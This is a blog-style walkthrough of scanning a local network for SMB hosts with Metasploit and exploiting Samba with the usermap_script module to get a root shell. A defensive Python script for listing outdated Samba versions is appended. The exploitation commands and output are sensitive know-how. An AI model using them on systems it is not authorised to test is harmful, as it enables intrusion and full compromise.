Kali Linux: Breaking into Network Neighbourhood / SAMBA
Source: http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/
Perform Enumeration
Type in the console
msfconsole
The output will look roughly like this
Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready...
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED....and...
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!
YOU DIDN'T SAY THE MAGIC WORD!

Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.4-2015071403                  ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
For a more polite version, TYPE
msfconsole thankyou
The output will be
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||

Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.4-2015071403                  ]
+ -- --=[ 1467 exploits - 840 auxiliary - 232 post        ]
+ -- --=[ 432 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
TYPE
use auxiliary/scanner/smb/smb_version
show options
Output
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOSTS                      yes       The target address range or CIDR identifier
SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
SMBPass                     no        The password for the specified username
SMBUser                     no        The username to authenticate as
THREADS    1                yes       The number of concurrent threads
TYPE
set RHOSTS 192.168.0.0/24
set THREADS 75
run
The result
[*] 192.168.0.7:445 could not be identified: Unix (Samba 3.6.3-31a.osstech)
[*] Scanned 44 of 256 hosts (17% complete)
[*] Scanned 68 of 256 hosts (26% complete)
[*] Scanned 78 of 256 hosts (30% complete)
[*] 192.168.0.90:445 is running Windows 7 Professional SP1 (build:7601) (name:HP-PC) (domain:WORKGROUP)
[*] Scanned 152 of 256 hosts (59% complete)
[*] Scanned 153 of 256 hosts (59% complete)
[*] 192.168.0.221:445 could not be identified: Unix (Samba 3.0.37)
[*] Scanned 156 of 256 hosts (60% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 227 of 256 hosts (88% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
TYPE
use exploit/multi/samba/usermap_script
show options
Output
Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
TYPE
set RHOST 192.168.0.7
exploit
And like magic we have a command shell! This means we are in the SAMBA server itself. If we type “ls” without quotes, this will list the directory; with this exploit we are in the root folder. Now, just to be 100% sure we owned this box, I want you to type “whoami” without quotes, and you can see below for yourself that the server responded with “root”. Good Game Samba Box!
whoami
This concludes the owning Samba Servers blog. I will have more introduction blogs coming soon on the Metasploit framework, so stay tuned!
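When auditing your own network, the smb_version output shown earlier can be turned into an inventory of SMB hosts and the Samba releases they advertise, so outdated servers can be queued for upgrade. The Python below is an added example, not part of the original post; the sample lines are copied from the scan output on this page, while MIN_SAMBA and the function names are assumptions chosen for illustration.

```python
import re

# Lines copied from the smb_version run shown on this page.
SCAN_OUTPUT = """\
[*] 192.168.0.7:445 could not be identified: Unix (Samba 3.6.3-31a.osstech)
[*] Scanned 44 of 256 hosts (17% complete)
[*] 192.168.0.90:445 is running Windows 7 Professional SP1 (build:7601) (name:HP-PC) (domain:WORKGROUP)
[*] 192.168.0.221:445 could not be identified: Unix (Samba 3.0.37)
"""

# Assumption: site policy value, not taken from the page. Set it to the
# oldest Samba release your distribution still patches.
MIN_SAMBA = (4, 0, 0)

HOST_RE = re.compile(
    r"^\[\*\] (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+) "
    r"(?:could not be identified: |is running )(?P<banner>.+)$"
)
SAMBA_RE = re.compile(r"Samba (\d+)\.(\d+)\.(\d+)")
NAME_RE = re.compile(r"\(name:([^)]+)\)")

def parse_scan(text):
    """Return one record per host line; progress lines are skipped."""
    hosts = []
    for line in text.splitlines():
        m = HOST_RE.match(line.strip())
        if not m:
            continue
        banner = m.group("banner")
        samba = SAMBA_RE.search(banner)
        name = NAME_RE.search(banner)
        hosts.append({
            "ip": m.group("ip"),
            "port": int(m.group("port")),
            "banner": banner,
            "name": name.group(1) if name else None,
            # Vendor suffixes such as "-31a.osstech" are dropped on purpose.
            "samba": tuple(map(int, samba.groups())) if samba else None,
        })
    return hosts

def outdated_samba(hosts, minimum=MIN_SAMBA):
    """Hosts whose advertised Samba version is below the policy minimum."""
    return [h for h in hosts if h["samba"] and h["samba"] < minimum]

if __name__ == "__main__":
    for h in outdated_samba(parse_scan(SCAN_OUTPUT)):
        print(f'{h["ip"]}:{h["port"]} Samba {".".join(map(str, h["samba"]))} needs upgrade')
```

The advertised version is only a hint: distributions backport fixes without changing it, so confirm the patch level on the host itself before closing a finding.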